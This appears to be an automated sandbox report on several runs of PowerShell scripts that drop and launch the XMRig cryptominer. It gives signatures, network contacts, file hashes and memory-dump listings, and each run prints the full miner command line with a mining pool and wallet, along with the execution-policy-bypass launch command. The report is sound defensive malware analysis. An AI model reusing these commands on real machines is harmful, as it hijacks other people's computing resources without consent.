memory/3604-110-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-111-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-112-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-113-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-114-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-115-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-116-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23ayt3c5.uit.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p25xlwga.fyt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:52

Platform

win11-20240426-en

Max time kernel

1792s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ny35ehk.zyo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:59

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yy4l3rq.4ya.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4660-11-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-12-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-14-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/4660-16-0x0000024229830000-0x000002422983A000-memory.dmp

memory/4660-15-0x0000024229E90000-0x0000024229EA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/776-47-0x0000020F77B00000-0x0000020F77B20000-memory.dmp

memory/776-48-0x0000020F77B50000-0x0000020F77B70000-memory.dmp

memory/776-49-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-51-0x0000020F77B70000-0x0000020F77B90000-memory.dmp

memory/4660-52-0x00007FFB06F83000-0x00007FFB06F85000-memory.dmp

memory/776-50-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/4660-53-0x00007FFB06F80000-0x00007FFB07A41000-memory.dmp

memory/776-54-0x0000020F77B90000-0x0000020F77BB0000-memory.dmp

memory/776-55-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-56-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-57-0x0000020F77B70000-0x0000020F77B90000-memory.dmp

memory/776-58-0x0000020F77B90000-0x0000020F77BB0000-memory.dmp

memory/776-59-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-60-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-61-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-62-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-63-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-64-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-65-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-66-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-67-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-68-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-69-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-70-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-71-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-72-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-73-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-74-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-75-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-76-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-77-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-78-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-79-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-80-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-81-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-82-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-83-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-84-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-85-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-86-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-87-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-88-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-89-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-90-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-91-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-92-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-93-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-94-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-95-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-96-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-97-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-98-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-99-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-100-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-101-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-102-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-103-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-104-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-105-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-106-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-107-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-108-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-109-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-110-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-111-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-112-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-113-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-114-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-115-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-116-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

memory/776-117-0x00007FF61AEF0000-0x00007FF61BB23000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:45

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/5052-3-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/5052-5-0x000001EC2E960000-0x000001EC2E982000-memory.dmp

memory/5052-6-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-9-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-10-0x000001EC470A0000-0x000001EC47116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dudrpiki.jay.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5052-26-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-49-0x000001EC47120000-0x000001EC47132000-memory.dmp

memory/5052-62-0x000001EC46F00000-0x000001EC46F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4268-91-0x0000020AEEEE0000-0x0000020AEEF00000-memory.dmp

memory/4268-92-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-93-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/5052-94-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-95-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/5052-96-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/4268-97-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-98-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-99-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-100-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-101-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-102-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-103-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-104-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-105-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-106-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-107-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-108-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-109-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-110-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-111-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-112-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-113-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-114-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-115-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-116-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-117-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-118-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-119-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-120-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-121-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-122-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-123-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-124-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

memory/4268-125-0x00007FF6D5050000-0x00007FF6D5C83000-memory.dmp

